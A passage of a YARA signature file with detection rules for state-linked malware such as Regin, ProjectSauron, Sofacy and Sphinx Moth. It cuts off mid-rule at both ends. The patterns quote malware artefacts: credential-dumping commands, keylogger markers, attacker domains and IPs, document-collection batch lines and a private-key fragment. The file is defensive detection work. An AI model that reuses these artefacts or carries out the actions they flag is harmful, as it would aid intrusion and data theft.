    ($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
}

rule apt_regin_dispatcher_disp_dll {
  meta:
    copyright = "Kaspersky Lab"
    author = "Kaspersky Lab"
    description = "Rule to detect Regin disp.dll dispatcher"
    version = "1.0"
    last_modified = "2014-11-18"
  strings:
    $mz = "MZ"
    $string1 = "shit"
    $string2 = "disp.dll"
    $string3 = "255.255.255.255"
    $string4 = "StackWalk64"
    $string5 = "imagehlp.dll"
  condition:
    ($mz at 0) and (all of ($string*))
}

rule apt_regin_2013_64bit_stage1 {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Regin 64 bit stage 1 loaders"
    version = "1.0"
    last_modified = "2014-11-18"
    filename = "wshnetc.dll"
    md5 = "bddf5afbea2d0eed77f2ad4e9a4f044d"
    filename = "wsharp.dll"
    md5 = "c053a0a3f1edcbbfc9b51bc640e808ce"
  strings:
    $mz = "MZ"
    $a1 = "PRIVHEAD"
    $a2 = "\\\\.\\PhysicalDrive%d"
    $a3 = "ZwDeviceIoControlFile"
  condition:
    ($mz at 0) and (all of ($a*)) and filesize < 100000
}

rule remsec_executable_blob_32 {
  meta:
    author = "remsec"
  strings:
    $code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 }
  condition:
    all of them
}

rule remsec_executable_blob_64 {
  meta:
    author = "remsec"
  strings:
    $code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF }
  condition:
    all of them
}

rule remsec_executable_blob_parser {
  meta:
    author = "remsec"
  strings:
    $code = { ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 }
  condition:
    all of them
}

rule remsec_encrypted_api {
  meta:
    author = "remsec"
  strings:
    $open_process = { 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF }
  condition:
    all of them
}

rule remsec_packer_u {
  meta:
    author = "remsec"
  strings:
    $code = { 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B ) }
  condition:
    all of them
}

rule remsec_packer_B {
  meta:
    author = "remsec"
  strings:
    $code = { 00 00 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A }
  condition:
    all of them
}

rule apt_ProjectSauron_pipe_backdoor {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect ProjectSauron pipe backdoors"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  strings:
    $a1 = "CreateNamedPipeW" ascii fullword
    $a2 = "SetSecurityDescriptorDacl" ascii fullword
    $a3 = "GetOverlappedResult" ascii fullword
    $a4 = "TerminateThread" ascii fullword
    $a5 = "%s%s%X" wide fullword
  condition:
    uint16(0) == 23117 and (all of ($a*)) and filesize < 100000
}

rule apt_ProjectSauron_encrypted_LSA {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect ProjectSauron encrypted LSA samples"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  strings:
    $a1 = "EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492" ascii fullword
    $a2 = "\\Device\\NdisRaw_" ascii fullword
    $a3 = "\\\\.\\GLOBALROOT\\Device\\{8EDB44DC-86F0-4E0E-8068-BD2CABA4057A}" wide fullword
    $a4 = "Global\\{a07f6ba7-8383-4104-a154-e582e85a32eb}" wide fullword
    $a5 = "Missing function %S::#%d" wide fullword
    $a6 = { 89 45 D0 8D 85 98 FE FF FF 2B D0 89 45 D8 8D 45 BC 83 C2 04 50 C7 45 C0 03 00 00 00 89 75 C4 89 55 DC FF 55 FC 8B F8 8D 8F 00 00 00 3A 83 F9 09 77 30 53 33 DB 53 FF 15 }
    $a7 = { 48 8D 4C 24 30 48 89 44 24 50 48 8D 45 20 44 88 64 24 30 48 89 44 24 60 48 8D 45 20 C7 44 24 34 03 00 00 00 2B D8 48 89 7C 24 38 44 89 6C 24 40 83 C3 08 89 5C 24 68 41 FF D6 8D 88 00 00 00 3A 8B D8 83 F9 09 77 2D FF }
  condition:
    uint16(0) == 23117 and (any of ($a*) or (pe.exports("InitializeChangeNotify") and pe.exports("PasswordChangeNotify") and math.entropy(1024, filesize) >= 7.500000)) and filesize < 1000000
}

rule apt_ProjectSauron_encrypted_SSPI {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect encrypted ProjectSauron SSPI samples"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  condition:
    uint16(0) == 23117 and filesize < 1000000 and pe.exports("InitSecurityInterfaceA") and pe.characteristics & pe.DLL and (pe.machine == pe.MACHINE_AMD64 or pe.machine == pe.MACHINE_IA64) and math.entropy(1024, filesize) >= 7.500000
}

rule apt_ProjectSauron_MyTrampoline {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect ProjectSauron MyTrampoline module"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  strings:
    $a1 = ":\\System Volume Information\\{" wide
    $a2 = "\\\\.\\PhysicalDrive%d" wide
    $a3 = "DMWndClassX%d"
    $b1 = "{774476DF-C00F-4e3a-BF4A-6D8618CFA532}" ascii wide
    $b2 = "{820C02A4-578A-4750-A409-62C98F5E9237}" ascii wide
  condition:
    uint16(0) == 23117 and filesize < 5000000 and (all of ($a*) or any of ($b*))
}

rule apt_ProjectSauron_encrypted_container {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect ProjectSauron samples encrypted container"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  strings:
    $vfs_header = { 02 AA 02 C1 02 0? }
    $salt = { 91 0A E0 CC 0D FE CE 36 78 48 9B 9C 97 F7 F5 55 }
  condition:
    uint16(0) == 23117 and ((@vfs_header < 16384) or $salt) and math.entropy(1024, filesize) >= 6.500000 and (filesize > 1024) and filesize < 10000000
}

rule apt_ProjectSauron_encryption {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect ProjectSauron string encryption"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  strings:
    $a1 = { 81 ?? 02 AA 02 C1 75 ?? 8B ?? 06 85 }
    $a2 = { 91 8D 9A 94 CD CC 93 9A 93 93 9B D1 8B 9A B8 DE 9C 90 8D AF 8D 9B 9B BE 8C 8C 9A FF }
    $a3 = { 80 3E 22 57 75 ?? 80 7E 01 9F 75 ?? 80 7E 02 BE 75 ?? 80 7E 03 09 }
  condition:
    filesize < 5000000 and any of ($a*)
}

rule apt_ProjectSauron_generic_pipe_backdoor {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect ProjectSauron generic pipe backdoors"
    version = "1.0"
    reference = "https://securelist.com/blog/"
  strings:
    $a = { C7 [2-3] 32 32 32 32 E8 }
    $b = { 42 12 67 6B }
    $c = { 25 31 5F 73 }
    $d = "rand"
    $e = "WS2_32"
  condition:
    uint16(0) == 23117 and (all of them) and filesize < 400000
}

rule APT_Project_Sauron_Scripts {
  meta:
    description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky"
    author = "Florian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-08"
  strings:
    $x1 = "local t = w.exec2str(\"regedit "
    $x2 = "local r = w.exec2str(\"cat"
    $x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence"
    $x4 = "move O FakeVirtualEncryptedNetwork.dll"
    $x5 = "sinfo | basex b 32url | dext l 30"
    $x6 = "w.exec2str(execStr)"
    $x7 = "netnfo irc | basex b 32url"
    $x8 = "w.exec(\"wfw status\")"
    $x9 = "exec(\"samdump\")"
    $x10 = "cat VirtualEncryptedNetwork.ini|grep"
    $x11 = "if string.lower(k) == \"securityproviders\" then"
    $x12 = "exec2str(\"plist b | grep netsvcs\")"
    $x13 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*"
    $x14 = "SAURON_KBLOG_KEY ="
  condition:
    1 of them
}

rule APT_Project_Sauron_arping_module {
  meta:
    description = "Detects strings from arping module - Project Sauron report by Kaspersky"
    author = "Florian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-08"
  strings:
    $s1 = "Resolve hosts that answer"
    $s2 = "Print only replying Ips"
    $s3 = "Do not display MAC addresses"
  condition:
    all of them
}

rule APT_Project_Sauron_kblogi_module {
  meta:
    description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
    author = "Florian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-08"
  strings:
    $x1 = "Inject using process name or pid. Default"
    $s2 = "Convert mode: Read log from file and convert to text"
    $s3 = "Maximum running time in seconds"
  condition:
    $x1 or 2 of them
}

rule APT_Project_Sauron_basex_module {
  meta:
    description = "Detects strings from basex module - Project Sauron report by Kaspersky"
    author = "Florian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-08"
  strings:
    $x1 = "64, 64url, 32, 32url or 16."
    $s2 = "Force decoding when input is invalid/corrupt"
    $s3 = "This cruft"
  condition:
    $x1 or 2 of them
}

rule APT_Project_Sauron_dext_module {
  meta:
    description = "Detects strings from dext module - Project Sauron report by Kaspersky"
    author = "Florian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-08"
  strings:
    $x1 = "Assemble rows of DNS names back to a single string of data"
    $x2 = "removes checks of DNS names and lengths (during split)"
    $x3 = "Randomize data lengths (length/2 to length)"
    $x4 = "This cruft"
  condition:
    2 of them
}

rule Hacktool_This_Cruft {
  meta:
    description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
    author = "Florian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-08"
    score = 60
  strings:
    $x1 = "This cruft" fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and $x1)
}

rule APT_Project_Sauron_Custom_M1 {
  meta:
    description = "Detects malware from Project Sauron APT"
    author = "FLorian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-09"
    hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9"
  strings:
    $s1 = "ncnfloc.dll" wide fullword
    $s4 = "Network Configuration Locator" wide fullword
    $op0 = { 80 75 6E 85 C0 79 6A 66 41 83 38 0A 75 63 0F B7 }
    $op1 = { 80 75 29 85 C9 79 25 B9 01 }
    $op2 = { 2B D8 48 89 7C 24 38 44 89 6C 24 40 83 C3 08 89 }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and (all of ($s*)) and 1 of ($op*)) or (all of them)
}

rule APT_Project_Sauron_Custom_M2 {
  meta:
    description = "Detects malware from Project Sauron APT"
    author = "FLorian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-09"
    hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8"
  strings:
    $s2 = "\\*\\3vpn" ascii fullword
    $op0 = { 55 8B EC 83 EC 0C 53 56 33 F6 39 75 08 57 89 75 }
    $op1 = { 59 59 C3 8B 65 E8 FF 75 88 FF 15 50 20 40 00 FF }
    $op2 = { 8B 4F 06 85 C9 74 14 83 F9 12 0F 82 A7 }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and (all of ($s*)) and all of ($op*))
}

rule APT_Project_Sauron_Custom_M3 {
  meta:
    description = "Detects malware from Project Sauron APT"
    author = "FLorian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-09"
    hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec"
  strings:
    $s1 = "ExampleProject.dll" ascii fullword
    $op0 = { 8B 4F 06 85 C9 74 14 83 F9 13 0F 82 BA }
    $op1 = { FF 15 34 20 00 10 85 C0 59 A3 60 30 00 10 75 04 }
    $op2 = { 55 8B EC FF 4D 0C 75 09 FF 75 08 FF 15 00 20 00 }
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and (all of ($s*)) and all of ($op*))
}

rule APT_Project_Sauron_Custom_M4 {
  meta:
    description = "Detects malware from Project Sauron APT"
    author = "FLorian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-09"
    hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57"
  strings:
    $s1 = "xpsmngr.dll" wide fullword
    $s2 = "XPS Manager" wide fullword
    $op0 = { 89 4D E8 89 4D EC 89 4D F0 FF D2 3D 08 00 00 C6 }
    $op1 = { 55 8B EC FF 4D 0C 75 09 FF 75 08 FF 15 04 20 5B }
    $op2 = { 8B 4F 06 85 C9 74 14 83 F9 13 0F 82 B6 }
  condition:
    (uint16(0) == 23117 and filesize < 92160 and (all of ($s*)) and 1 of ($op*)) or (all of them)
}

rule APT_Project_Sauron_Custom_M6 {
  meta:
    description = "Detects malware from Project Sauron APT"
    author = "FLorian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-09"
    hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8"
  strings:
    $s1 = "rseceng.dll" wide fullword
    $s2 = "Remote Security Engine" wide fullword
    $op0 = { 8B 0D D5 1D 00 00 85 C9 0F 8E A2 }
    $op1 = { 80 75 6E 85 C0 79 6A 66 41 83 38 0A 75 63 0F B7 }
    $op2 = { 80 75 29 85 C9 79 25 B9 01 }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and (all of ($s*)) and 1 of ($op*)) or (all of them)
}

rule APT_Project_Sauron_Custom_M7 {
  meta:
    description = "Detects malware from Project Sauron APT"
    author = "FLorian Roth"
    reference = "https://goo.gl/eFoP4A"
    date = "2016-08-09"
    hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd"
    hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca"
  strings:
    $sx1 = "Default user" wide fullword
    $sx2 = "Hincorrect header check" ascii fullword
    $sa1 = "MSAOSSPC.dll" ascii fullword
    $sa2 = "MSAOSSPC.DLL" wide fullword
    $sa3 = "MSAOSSPC" wide fullword
    $sa4 = "AOL Security Package" wide fullword
    $sa5 = "AOL Security Package" wide fullword
    $sa6 = "AOL Client for 32 bit platforms" wide fullword
    $op0 = { 8B CE 5B E9 4B FF FF FF 55 8B EC 51 53 8B 5D 08 }
    $op1 = { E8 0A FE FF FF 8B 4D 14 89 46 04 89 41 04 8B 45 }
    $op2 = { E9 29 FF FF FF 83 7D FC 00 0F 84 CF 0A 00 00 8B }
    $op3 = { 83 F8 0C 0F 85 3A 01 00 00 44 2B 41 6C 41 8B C9 }
    $op4 = { 44 39 57 0C 0F 84 D6 0C 00 00 44 89 6F 18 45 89 }
    $op5 = { C1 ED 02 83 C6 FE E9 68 FE FF FF 44 39 57 08 75 }
  condition:
    uint16(0) == 23117 and filesize < 204800 and ((3 of ($s*) and 3 of ($op*)) or (1 of ($sx*) and 1 of ($sa*)))
}

rule Scieron {
  meta:
    author = "Symantec Security Response"
    ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
    date = "22.01.15"
  strings:
    $code1 = { 66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05 }
    $code2 = { 83 F? 09 0F 87 ?? 0? 00 00 FF 24 }
    $str1 = "IP_PADDING_DATA" ascii wide
    $str2 = "PORT_NUM" ascii wide
  condition:
    all of them
}

rule SeaDuke_Sample {
  meta:
    description = "SeaDuke Malware - file 3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d"
    author = "Florian Roth"
    reference = "http://goo.gl/MJ0c2M"
    date = "2015-07-14"
    score = 70
    hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e"
  strings:
    $s0 = "bpython27.dll" ascii fullword
    $s1 = "email.header(" ascii fullword
    $s2 = "LogonUI.exe" wide fullword
    $s3 = "Crypto.Cipher.AES(" ascii fullword
    $s4 = "mod is NULL - %s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 4096000 and all of them
}

rule susp_file_enumerator_with_encrypted_resource_101 {
  meta:
    copyright = "Kaspersky Lab"
    description = "Generic detection for samples that enumerate files with encrypted resource called 101"
    hash = "2cd0a5f1e9bcce6807e57ec8477d222a"
    hash = "c843046e54b755ec63ccb09d0a689674"
    version = "1.4"
  strings:
    $mz = "This program cannot be run in DOS mode."
    $a1 = "FindFirstFile" ascii wide nocase
    $a2 = "FindNextFile" ascii wide nocase
    $a3 = "FindResource" ascii wide nocase
    $a4 = "LoadResource" ascii wide nocase
  condition:
    uint16(0) == 23117 and all of them and filesize < 700000 and pe.number_of_sections > 4 and pe.number_of_signatures == 0 and pe.number_of_resources > 1 and pe.number_of_resources < 15 and for any i in (0..pe.number_of_resources - 1) : ((math.entropy(pe.resources[i].offset, pe.resources[i].length) > 7.800000) and pe.resources[i].id == 101 and pe.resources[i].length > 20000 and pe.resources[i].language == 0 and not ($mz in (pe.resources[i].offset..pe.resources[i].offset + pe.resources[i].length)))
}

rule StoneDrill_main_sub {
  meta:
    author = "Kaspersky Lab"
    description = "Rule to detect StoneDrill (decrypted) samples"
    hash = "d01781f1246fd1b64e09170bd6600fe1"
    hash = "ac3c25534c076623192b9381f926ba0d"
    version = "1.0"
  strings:
    $code = { B8 08 00 FE 7F FF 30 8F 44 24 ?? 68 B4 0F 00 00 FF 15 ?? ?? ?? 00 B8 08 00 FE 7F FF 30 8F 44 24 ?? 8B ?? 24 [1-4] 2B ?? 24 [6] F7 ?1 [5-12] 00 }
  condition:
    uint16(0) == 23117 and $code and filesize < 5000000
}

rule SNOWGLOBE_Babar_Malware {
  meta:
    description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
    author = "Florian Roth"
    reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
    date = "2015/02/18"
    hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
    score = 80
  strings:
    $mz = { 4D 5A }
    $z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
    $z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
    $z2 = "ExecQueryFailled!" ascii fullword
    $z3 = "NBOT_COMMAND_LINE" fullword
    $z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
    $s1 = "/s /n %s \"%s\"" ascii fullword
    $s2 = "%%WINDIR%%\\%s\\%s" ascii fullword
    $s3 = "/c start /wait " ascii fullword
    $s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
    $x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" ascii fullword
    $x2 = "%COMMON_APPDATA%" ascii fullword
    $x4 = "CONOUT$" ascii fullword
    $x5 = "cmd.exe" ascii fullword
    $x6 = "DLLPATH" ascii fullword
  condition:
    ($mz at 0) and filesize < 1048576 and ((1 of ($z*) and 1 of ($x*)) or (3 of ($s*) and 4 of ($x*)))
}

rule apt_sofacy_xtunnel {
  meta:
    author = "Claudio Guarnieri"
    description = "Sofacy Malware - German Bundestag"
    score = 75
  strings:
    $xaps = ":\\PROJECT\\XAPS_"
    $variant11 = "XAPS_OBJECTIVE.dll"
    $variant12 = "start"
    $variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
    $variant22 = "is you live?"
    $mix1 = "176.31.112.10"
    $mix2 = "error in select, errno %d"
    $mix3 = "no msg"
    $mix4 = "is you live?"
    $mix5 = "127.0.0.1"
    $mix6 = "err %d"
    $mix7 = "i`m wait"
    $mix8 = "hello"
    $mix9 = "OpenSSL 1.0.1e 11 Feb 2013"
    $mix10 = "Xtunnel.exe"
  condition:
    ((uint16(0) == 23117) or (uint16(0) == 53200)) and (($xaps) or (all of ($variant1*)) or (all of ($variant2*)) or (6 of ($mix*)))
}

rule Sofacy_Bundestag_Winexe {
  meta:
    description = "Winexe tool used by Sofacy group in Bundestag APT"
    author = "Florian Roth"
    reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
    date = "2015-06-19"
    hash = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
    score = 70
  strings:
    $s1 = "\\\\.\\pipe\\ahexec" ascii fullword
    $s2 = "implevel" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 117760 and all of them
}

rule Sofacy_Bundestag_Mal2 {
  meta:
    description = "Sofacy Group Malware Sample 2"
    author = "Florian Roth"
    reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
    date = "2015-06-19"
    hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
    score = 70
  strings:
    $x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
    $x2 = "XAPS_OBJECTIVE.dll" ascii fullword
    $s1 = "i`m wait" ascii fullword
  condition:
    uint16(0) == 23117 and (1 of ($x*)) and $s1
}

rule Sofacy_Bundestag_Mal3 {
  meta:
    description = "Sofacy Group Malware Sample 3"
    author = "Florian Roth"
    reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
    date = "2015-06-19"
    hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
    score = 70
  strings:
    $s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii fullword
    $s2 = ".?AVAgentModuleRemoteKeyLogger@@" ascii fullword
    $s3 = "<font size=4 color=red>process isn't exist</font>" ascii fullword
    $s4 = "<font size=4 color=red>process is exist</font>" ascii fullword
    $s5 = ".winnt.check-fix.com" ascii fullword
    $s6 = ".update.adobeincorp.com" ascii fullword
    $s7 = ".microsoft.checkwinframe.com" ascii fullword
    $s8 = "adobeincorp.com" wide fullword
    $s9 = "# EXC: HttpSender - Cannot create Get Channel!" ascii fullword
    $x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
    $x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
    $x3 = "C:\\Windows\\System32\\cmd.exe" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and (2 of ($s*) or (1 of ($s*) and all of ($x*)))
}

rule Sofacy_Bundestag_Batch {
  meta:
    description = "Sofacy Bundestags APT Batch Script"
    author = "Florian Roth"
    reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
    date = "2015-06-19"
    score = 70
  strings:
    $s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx) do (" ascii
    $s2 = "cmd /c copy"
    $s3 = "forfiles"
  condition:
    filesize < 10240 and all of them
}

rule Sofacy_Fybis_ELF_Backdoor_Gen1 {
  meta:
    description = "Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1"
    author = "Florian Roth"
    reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
    date = "2016-02-13"
    score = 80
    hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
    hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
  strings:
    $x1 = "Your command not writed to pipe" ascii fullword
    $x2 = "Terminal don`t started for executing command" ascii fullword
    $x3 = "Command will have end with \\n" ascii fullword
    $s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" ascii fullword
    $s2 = "Success execute command or long for waiting executing your command" ascii fullword
    $s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" ascii fullword
    $s4 = "rm -f /usr/lib/systemd/system/" ascii fullword
    $s5 = "ExecStart=" ascii fullword
    $s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 512000 and 1 of ($x*)) or (1 of ($x*) and 3 of ($s*))
}

rule Sofacy_Fysbis_ELF_Backdoor_Gen2 {
  meta:
    description = "Detects Sofacy Fysbis Linux Backdoor"
    author = "Florian Roth"
    reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
    date = "2016-02-13"
    score = 80
    hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
    hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
    hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
  strings:
    $s1 = "RemoteShell" ascii
    $s2 = "basic_string::_M_replace_dispatch" ascii fullword
    $s3 = "HttpChannel" ascii
  condition:
    uint16(0) == 17791 and filesize < 512000 and all of them
}

rule Sofacy_Jun16_Sample1 {
  meta:
    description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
    author = "Florian Roth"
    reference = "http://goo.gl/mzAa97"
    date = "2016-06-14"
    score = 85
    hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"
  strings:
    $s1 = "clconfg.dll" ascii fullword
    $s2 = "ASijnoKGszdpodPPiaoaghj8127391" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and (1 of ($s*))) or (all of them)
}

rule Sofacy_Jun16_Sample2 {
  meta:
    description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
    author = "Florian Roth"
    reference = "http://goo.gl/mzAa97"
    date = "2016-06-14"
    score = 85
    hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
    hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
    hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"
  strings:
    $x1 = "DGMNOEP" ascii fullword
    $x2 = "/%s%s%s/?%s=" ascii fullword
    $s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" ascii fullword
    $s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" ascii fullword
    $s3 = "svchost.dll" wide fullword
    $s4 = "clconfig.dll" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and (all of ($x*))) or (3 of them)
}

rule Sofacy_Jun16_Sample3 {
  meta:
    description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
    author = "Florian Roth"
    reference = "http://goo.gl/mzAa97"
    date = "2016-06-14"
    score = 85
    hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"
  strings:
    $s1 = "ASLIiasiuqpssuqkl713h" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and $s1
}

rule Sphinx_Moth_cudacrt {
  meta:
    description = "sphinx moth threat group file cudacrt.dll"
    author = "Kudelski Security - Nagravision SA"
    reference = "www.kudelskisecurity.com"
    date = "2015-08-06"
  strings:
    $s0 = "HPSSOEx.dll" wide fullword
    $s1 = "255.255.255.254" wide fullword
    $s2 = "SOFTWARE\\SsoAuth\\Service" wide fullword
    $op0 = { FF 15 5F DE 00 00 48 8B F8 48 85 C0 75 0D 48 8B }
    $op1 = { 45 33 C9 4C 8D 05 A7 07 00 00 33 D2 33 C9 FF 15 }
    $op2 = { E8 7A 1C 00 00 83 F8 01 74 17 B9 03 }
  condition:
    uint16(0) == 23117 and filesize < 248832 and all of ($s*) and 1 of ($op*)
}

rule Sphinx_Moth_h2t {
  meta:
    description = "sphinx moth threat group file h2t.dat"
    author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
    reference = "www.kudelskisecurity.com"
    date = "2015-08-06"
  strings:
    $x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" ascii fullword
    $s1 = "[-] Error in connection() %d - %s" ascii fullword
    $s2 = "[-] Child process exit." ascii fullword
    $s3 = "POST http://%s:%s/ HTTP/1.1" ascii fullword
    $s4 = "pipe() to" ascii fullword
    $s5 = "pipe() from" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 159744 and ($x1 or all of ($s*))
}

rule Sphinx_Moth_iastor32 {
  meta:
    description = "sphinx moth threat group file iastor32.exe"
    author = "Kudelski Security - Nagravision SA"
    reference = "www.kudelskisecurity.com"
    date = "2015-08-06"
  strings:
    $s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" ascii fullword
    $s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and all of them
}

rule Sphinx_Moth_kerberos32 {
  meta:
